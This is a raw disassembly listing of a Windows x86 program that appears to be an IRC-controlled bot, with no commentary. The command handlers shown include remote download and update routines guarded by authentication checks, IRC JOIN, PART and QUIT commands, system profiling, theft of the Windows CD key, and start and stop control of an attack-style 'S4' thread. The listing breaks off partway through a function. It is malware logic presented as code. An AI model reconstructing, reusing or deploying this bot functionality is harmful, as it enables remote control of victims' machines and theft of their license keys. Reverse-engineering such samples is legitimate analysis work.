		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40188A:				; CODE XREF: sub_40177B+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40188A
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018BB:				; CODE XREF: sub_40177B+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018BB
		mov	ebx, [ebp-4C0h]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018EE:				; CODE XREF: sub_40177B+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018EE
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	esi, [eax+1]

loc_40191B:				; CODE XREF: sub_40177B+1A5j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40191B
		sub	eax, esi
		mov	[ebp+eax-295h],	cl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	4
		mov	[ebp-193h], al
		pop	eax
		cmp	[ebp+1Ch], eax
		jl	short loc_40198B
		mov	[ebp-4BCh], eax

loc_40194B:				; CODE XREF: sub_40177B+203j
		mov	eax, [ebx+eax*4]
		push	3
		mov	edi, offset dword_421BFC
		mov	esi, eax
		pop	ecx
		xor	edx, edx
		repe cmpsb
		jz	short loc_401982
		mov	esi, eax
		push	2
		mov	edi, offset dword_421C00
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_401982
		mov	eax, [ebp-4BCh]
		inc	eax
		cmp	eax, [ebp+1Ch]
		mov	[ebp-4BCh], eax
		jle	short loc_40194B
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_401982:				; CODE XREF: sub_40177B+1E1j
					; sub_40177B+1F1j
		mov	byte ptr [ebp-195h], 1
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_40198B:				; CODE XREF: sub_40177B+1C8j
		mov	byte ptr [ebp-195h], 0

loc_401992:				; CODE XREF: sub_40177B+205j
					; sub_40177B+20Ej
		push	8
		mov	byte ptr [ebp-194h], 0
		call	sub_4035D9
		pop	ecx
		mov	[ebp-4C0h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_4019EB
		push	offset sub_41C4C0
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_421C04
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_4019EB
; ---------------------------------------------------------------------------

loc_4019C8:				; CODE XREF: sub_40177B+CDj
		push	offset aDlAuthFailure_ ; "DL: Auth Failure."
		push	dword ptr [ebp-4BCh]
		jmp	short loc_4019DB
; ---------------------------------------------------------------------------

loc_4019D5:				; CODE XREF: sub_40177B+2Ej
		push	offset aDlInvalidArgum ; "DL: Invalid Arguments"
		push	eax

loc_4019DB:				; CODE XREF: sub_40177B+258j
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

loc_4019EB:				; CODE XREF: sub_40177B+96j
					; sub_40177B+232j ...
		call	sub_404C3F
		retn	1Ch
sub_40177B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4019F3	proc near		; DATA XREF: zcrshv4o:off_421C6Co
		push	4B8h
		mov	eax, offset loc_41CF4E
		call	sub_404BF5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4C0h], eax
		mov	[ebp-4BCh], edi
		jl	loc_401BFF
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_408130
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41C177
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset dword_427E50
		call	sub_41A301
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401A8F
		cmp	byte_427C0A, 0
		jz	loc_401C15

loc_401A8F:				; CODE XREF: sub_4019F3+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401A9B:				; CODE XREF: sub_4019F3+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401AB9
		test	dl, dl
		jz	short loc_401AB5
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401AB9
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401A9B

loc_401AB5:				; CODE XREF: sub_4019F3+B0j
		xor	eax, eax
		jmp	short loc_401ABE
; ---------------------------------------------------------------------------

loc_401AB9:				; CODE XREF: sub_4019F3+ACj
					; sub_4019F3+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_401ABE:				; CODE XREF: sub_4019F3+C4j
		test	eax, eax
		jnz	loc_401BF2
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_408130
		push	dword ptr [ebp-4C0h]
		mov	esi, offset dword_421BF8
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_401B02:				; CODE XREF: sub_4019F3+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B02
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B33:				; CODE XREF: sub_4019F3+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B33
		mov	ebx, [ebp-4BCh]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B66:				; CODE XREF: sub_4019F3+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B66
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B93:				; CODE XREF: sub_4019F3+1A5j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B93
		sub	eax, ecx
		mov	[ebp+eax-295h],	dl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	8
		mov	[ebp-193h], al
		mov	byte ptr [ebp-195h], 1
		mov	byte ptr [ebp-194h], 1
		call	sub_4035D9
		pop	ecx
		mov	[ebp-4BCh], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_401C15
		push	offset sub_41C4C0
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_421C04
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_401C15
; ---------------------------------------------------------------------------

loc_401BF2:				; CODE XREF: sub_4019F3+CDj
		push	offset aUpdAuthFailure ; "UPD: Auth Failure."
		push	dword ptr [ebp-4C0h]
		jmp	short loc_401C05
; ---------------------------------------------------------------------------

loc_401BFF:				; CODE XREF: sub_4019F3+2Ej
		push	offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
		push	eax

loc_401C05:				; CODE XREF: sub_4019F3+20Aj
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

loc_401C15:				; CODE XREF: sub_4019F3+96j
					; sub_4019F3+1E4j ...
		call	sub_404C3F
		retn	1Ch
sub_4019F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401C1D	proc near		; DATA XREF: zcrshv4o:off_421CE0o

arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	edi
		xor	edi, edi
		inc	edi
		cmp	[ebp+arg_14], edi
		jl	loc_401CF7
		push	esi
		push	1F8h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		push	0
		push	esi
		call	sub_408130
		add	esp, 14h
		cmp	[ebp+arg_14], edi
		jnz	short loc_401C81
		mov	eax, [ebp+arg_18]
		push	dword ptr [eax+4]
		push	offset dword_421BF8
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 10h
		lea	edx, [eax+1]

loc_401C73:				; CODE XREF: sub_401C1D+5Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_401C73
		sub	eax, edx
		mov	[eax+esi], cl
		jmp	short loc_401CDB
; ---------------------------------------------------------------------------

loc_401C81:				; CODE XREF: sub_401C1D+32j
		jl	short loc_401CDB
		push	ebx
		mov	ebx, [ebp+arg_18]

loc_401C87:				; CODE XREF: sub_401C1D+BBj
		cmp	edi, 1
		jnz	short loc_401CA8
		push	dword ptr [ebx+4]
		push	offset dword_421BF8
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_401CC3
; ---------------------------------------------------------------------------

loc_401CA8:				; CODE XREF: sub_401C1D+6Dj
		push	dword ptr [ebx+edi*4]
		push	esi
		push	offset dword_421C70
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 14h

loc_401CC3:				; CODE XREF: sub_401C1D+89j
		mov	eax, esi
		lea	ecx, [eax+1]

loc_401CC8:				; CODE XREF: sub_401C1D+B0j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401CC8
		sub	eax, ecx
		inc	edi
		cmp	edi, [ebp+arg_14]
		mov	[eax+esi], dl
		jle	short loc_401C87
		pop	ebx

loc_401CDB:				; CODE XREF: sub_401C1D+62j
					; sub_401C1D:loc_401C81j
		push	esi
		push	offset dword_421C78
		mov	edi, offset dword_4294DC
		call	sub_417F4C
		push	esi
		call	sub_403129
		add	esp, 0Ch
		pop	esi
		jmp	short loc_401D07
; ---------------------------------------------------------------------------

loc_401CF7:				; CODE XREF: sub_401C1D+Aj
		push	offset aQuitIrnPowered ; "QUIT :Irn Powered\r\n"
		mov	edi, offset dword_4294DC
		call	sub_417F4C
		pop	ecx

loc_401D07:				; CODE XREF: sub_401C1D+D8j
		pop	edi
		pop	ebp
		retn	1Ch
sub_401C1D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401D0C	proc near		; DATA XREF: zcrshv4o:off_421CE8o

arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_14], 1
		push	edi
		jl	short loc_401D4A
		cmp	[ebp+arg_14], 2
		mov	eax, [ebp+arg_18]
		mov	edi, offset dword_4294DC
		jl	short loc_401D39
		push	dword ptr [eax+8]
		push	dword ptr [eax+4]
		push	offset aJoinSS	; "JOIN	%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D39:				; CODE XREF: sub_401D0C+16j
		push	dword ptr [eax+4]
		push	offset aJoinS	; "JOIN	%s\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D4A:				; CODE XREF: sub_401D0C+8j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

loc_401D62:				; CODE XREF: sub_401D0C+2Bj
					; sub_401D0C+3Cj
		pop	edi
		pop	ebp
		retn	1Ch
sub_401D0C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401D67	proc near		; DATA XREF: zcrshv4o:off_421CF0o

arg_4		= dword	ptr  8
arg_10		= dword	ptr  14h
arg_14		= dword	ptr  18h
arg_18		= dword	ptr  1Ch

		cmp	[esp+arg_14], 1
		jl	short loc_401D8A
		mov	eax, [esp+arg_18]
		push	edi
		push	dword ptr [eax+4]
		mov	edi, offset dword_4294DC
		push	offset aPartS	; "PART	%s\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		pop	edi
		jmp	short locret_401DA4
; ---------------------------------------------------------------------------

loc_401D8A:				; CODE XREF: sub_401D67+5j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[esp+4+arg_10]
		push	[esp+8+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

locret_401DA4:				; CODE XREF: sub_401D67+21j
		retn	1Ch
sub_401D67	endp


; =============== S U B	R O U T	I N E =======================================



sub_401DA7	proc near		; DATA XREF: zcrshv4o:off_421D54o

arg_4		= dword	ptr  8
arg_10		= dword	ptr  14h

		call	sub_419A20
		push	dword_4290CC
		push	dword_4290C8
		push	dword_4290C4
		push	dword_4290C0
		push	dword_4290BC
		push	dword_4290B8
		push	offset aSystemUptimeI6 ; "System Uptime: %I64u Days, %I64u Hours,"...
		push	[esp+1Ch+arg_10]
		push	[esp+20h+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 28h
		retn	1Ch
sub_401DA7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401DED	proc near		; DATA XREF: zcrshv4o:off_421D5Co

var_118		= dword	ptr -118h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 118h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		mov	[ebp+var_118], eax
		push	esi
		push	edi
		xor	eax, eax
		xor	ecx, ecx
		mov	[ebp+var_14], cl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		push	0FFh
		stosb
		push	ecx
		lea	eax, [ebp+var_113]
		push	eax
		mov	[ebp+var_114], cl
		call	sub_408130
		push	dword_4294DC
		lea	esi, [ebp+var_14]
		call	sub_419C46
		push	100h
		lea	esi, [ebp+var_114]
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		call	sub_41A301
		mov	eax, esi
		push	eax
		push	dword_4290B4
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aHttpSDS	; "http://%s:%d/%s"
		push	[ebp+var_118]
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		mov	ecx, [ebp+var_4]
		add	esp, 30h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	1Ch
sub_401DED	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401E90	proc near		; DATA XREF: zcrshv4o:off_421D64o

var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 104h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		mov	esi, [ebp+arg_10]
		push	0FFh
		lea	eax, [ebp+var_103]
		push	0
		push	eax
		mov	[ebp+var_104], 0
		call	sub_408130
		lea	eax, [ebp+var_104]
		push	eax
		call	sub_414954
		lea	eax, [ebp+var_104]
		push	eax
		push	offset aWindowsCdKeyS ;	"Windows CD Key: %s"
		push	esi
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		mov	ecx, [ebp+var_4]
		add	esp, 24h
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn	1Ch
sub_401E90	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401EF9	proc near		; DATA XREF: zcrshv4o:off_421DB0o

var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= byte ptr -128h
var_120		= byte ptr -120h
var_20		= word ptr -20h
var_1E		= byte ptr -1Eh
var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41CF13
		mov	eax, large fs:0
		push	eax
		sub	esp, 130h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+13Ch+var_14], eax
		push	ebx
		push	esi
		push	edi
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+14Ch+var_C]
		mov	large fs:0, eax
		mov	edi, [ebp+arg_10]
		mov	esi, [ebp+arg_18]
		push	104h
		lea	eax, [esp+150h+var_120]
		push	0
		push	eax
		mov	[esp+158h+var_13C], edi
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	offset dword_421BF8
		lea	eax, [esp+154h+var_120]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+15Ch+var_120]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401F76:				; CODE XREF: sub_401EF9+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401F76
		mov	ebx, [ebp+arg_4]
		sub	eax, ecx
		cmp	[ebp+arg_14], 1
		mov	[esp+eax+14Ch+var_120],	dl
		mov	[esp+14Ch+var_1E], bl
		jl	short loc_401FAD
		push	dword ptr [esi+4]
		call	sub_404376
		pop	ecx
		push	dword ptr [esi+4]
		mov	word_437B48, ax
		call	sub_404376
		pop	ecx
		jmp	short loc_401FB9
; ---------------------------------------------------------------------------

loc_401FAD:				; CODE XREF: sub_401EF9+98j
		mov	ax, word_427C08
		mov	word_437B48, ax

loc_401FB9:				; CODE XREF: sub_401EF9+B2j
		mov	[esp+14Ch+var_20], ax
		mov	eax, dword_437E4C
		mov	eax, [eax]
		mov	[esp+14Ch+var_134], eax
		mov	eax, offset dword_437E48
		mov	[esp+14Ch+var_138], eax
		mov	[esp+14Ch+var_130], eax

loc_401FD9:				; CODE XREF: sub_401EF9+11Fj
		mov	eax, dword_437E4C
		lea	edi, [esp+14Ch+var_130]
		lea	esi, [esp+14Ch+var_138]
		mov	[esp+14Ch+var_12C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_40201A
		mov	edi, offset off_421D68
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_402049
		lea	edi, [esp+14Ch+var_128]
		lea	esi, [esp+14Ch+var_138]
		call	sub_40166F
		jmp	short loc_401FD9
; ---------------------------------------------------------------------------

loc_40201A:				; CODE XREF: sub_401EF9+F8j
		push	8
		call	sub_4035D9
		pop	ecx
		mov	[esp+14Ch+var_13C], eax
		and	[esp+14Ch+var_4], 0
		test	eax, eax
		jz	short loc_402060
		push	offset sub_4147B2
		lea	ecx, [esp+150h+var_120]
		mov	edi, offset off_421D68
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_402060
; ---------------------------------------------------------------------------

loc_402049:				; CODE XREF: sub_401EF9+110j
		push	offset aS4AlreadyRunni ; "S4:Already Running"
		push	[esp+150h+var_13C]
		push	ebx
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

loc_402060:				; CODE XREF: sub_401EF9+137j
					; sub_401EF9+14Ej
		mov	ecx, [esp+14Ch+var_C]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [esp+13Ch+var_14]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_401EF9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402086	proc near		; DATA XREF: zcrshv4o:off_421DB8o

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 18h
		push	esi
		push	edi
		push	dword_429608
		call	ds:dword_41E280	; closesocket
		mov	eax, dword_437E4C
		mov	eax, [eax]
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_437E48
		mov	[esp+20h+var_18], eax
		mov	[esp+20h+var_10], eax

loc_4020B5:				; CODE XREF: sub_402086+6Ej
		mov	eax, dword_437E4C
		lea	edi, [esp+20h+var_10]
		lea	esi, [esp+20h+var_18]
		mov	dword ptr [esp+20h+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_402109
		mov	edi, offset off_421D68
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+20h+var_18]
		jz	short loc_4020F6
		lea	edi, [esp+20h+var_8]
		call	sub_40166F
		jmp	short loc_4020B5
; ---------------------------------------------------------------------------

loc_4020F6:				; CODE XREF: sub_402086+63j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86
		push	offset aS4ThreadStoppe ; "S4: Thread Stopped"
		jmp	short loc_40210E
; ---------------------------------------------------------------------------

loc_402109:				; CODE XREF: sub_402086+47j
		push	offset aS4NoThreadRunn ; "S4: No Thread	Running"

loc_40210E:				; CODE XREF: sub_402086+81j
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_402086	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402129	proc near		; DATA XREF: zcrshv4o:off_421E7Co

var_444		= byte ptr -444h
var_440		= dword	ptr -440h
var_43C		= dword	ptr -43Ch
var_438		= byte ptr -438h
var_430		= dword	ptr -430h
var_42C		= dword	ptr -42Ch
var_418		= byte ptr -418h
var_417		= byte ptr -417h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 444h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+444h+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		push	esi
		mov	[esp+454h+var_43C], eax
		xor	ebx, ebx
		lea	eax, [esp+454h+var_107]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_108], 0
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_307]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_308], bl
		call	sub_408130
		xor	eax, eax
		mov	[esp+45Ch+var_418], bl
		lea	edi, [esp+45Ch+var_417]
		stosd
		stosd
		stosd
		stosw
		add	esp, 0Ch
		push	esi
		stosb
		lea	eax, [esp+454h+var_407]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_408], bl
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_207]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_208], bl
		call	sub_408130
		add	esp, 0Ch
		push	8
		pop	ecx
		xor	eax, eax
		lea	edi, [esp+450h+var_438]
		rep stosd
		lea	eax, [esp+450h+var_438]
		mov	ebx, 100h
		push	eax
		mov	[esp+454h+var_440], ebx
		call	ds:off_41E098
		mov	edi, [esp+450h+var_430]
		mov	ecx, [esp+450h+var_42C]
		shr	edi, 14h
		shr	ecx, 14h
		mov	eax, edi
		sub	eax, ecx
		push	1
		mov	ecx, ebx
		lea	esi, [esp+454h+var_108]
		mov	dword ptr [esp+454h+var_444], eax
		call	sub_419AD1
		pop	ecx
		call	sub_41B1B7
		push	1
		push	ebx
		lea	esi, [esp+458h+var_308]
		call	sub_419A9F
		push	dword_4294DC
		lea	esi, [esp+45Ch+var_418]
		call	sub_419C46
		add	esp, 0Ch
		lea	eax, [esp+450h+var_440]
		push	eax
		lea	eax, [esp+454h+var_408]
		push	eax
		call	ds:off_41E048
		push	ebx
		lea	eax, [esp+454h+var_208]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		call	sub_419A20
		push	dword_4290CC
		lea	eax, [esp+454h+var_208]
		push	dword_4290C8
		push	dword_4290C4
		push	dword_4290C0
		push	dword_4290BC
		push	dword_4290B8
		push	eax
		lea	eax, [esp+46Ch+var_408]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [esp+474h+var_308]
		push	eax
		push	edi
		push	dword ptr [esp+47Ch+var_444]
		mov	esi, offset byte_429610
		push	dword_429710
		lea	eax, [esp+484h+var_108]
		push	esi
		push	dword_429714
		push	eax
		push	offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x	%s @ %dMhz] [RAM:"...
		push	[esp+494h+var_43C]
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		push	108h
		push	0
		push	esi
		call	sub_408130
		mov	ecx, [esp+4ACh+var_4]
		add	esp, 5Ch
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_402129	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4022EB	proc near		; DATA XREF: zcrshv4o:off_421E84o

var_18		= dword	ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_10]
		push	esi
		push	edi
		push	dword_4294DC
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_419C46
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41E264	; inet_addr
		push	2
		mov	[ebp+var_18], eax
		push	4
		lea	eax, [ebp+var_18]
		push	eax
		call	ds:dword_41E224	; gethostbyaddr
		test	eax, eax
		jnz	short loc_402358
		mov	eax, esi
		push	eax
		push	offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		jmp	short loc_402374
; ---------------------------------------------------------------------------

loc_402358:				; CODE XREF: sub_4022EB+50j
		push	dword ptr [eax]
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aNetIpSHostS ; "Net: IP:	%s Host: %s"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 18h

loc_402374:				; CODE XREF: sub_4022EB+6Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	1Ch
sub_4022EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_402385	proc near		; DATA XREF: zcrshv4o:off_421EB0o
		push	21Ch
		mov	eax, offset loc_41CEDE
		call	sub_404BF5
		cmp	dword ptr [ebp+1Ch], 5
		mov	edi, [ebp+18h]
		mov	esi, [ebp+20h]
		jl	loc_402486
		push	214h
		lea	eax, [ebp-224h]
		push	0
		push	eax
		call	sub_408130
		push	edi
		mov	ebx, offset dword_421BF8
		push	ebx
		mov	edi, 0FFh
		lea	eax, [ebp-224h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-224h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_4023DC:				; CODE XREF: sub_402385+5Cj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4023DC
		push	dword ptr [esi+4]
		sub	eax, ecx
		push	ebx
		mov	[ebp+eax-224h],	dl
		lea	eax, [ebp-124h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-124h]
		add	esp, 10h
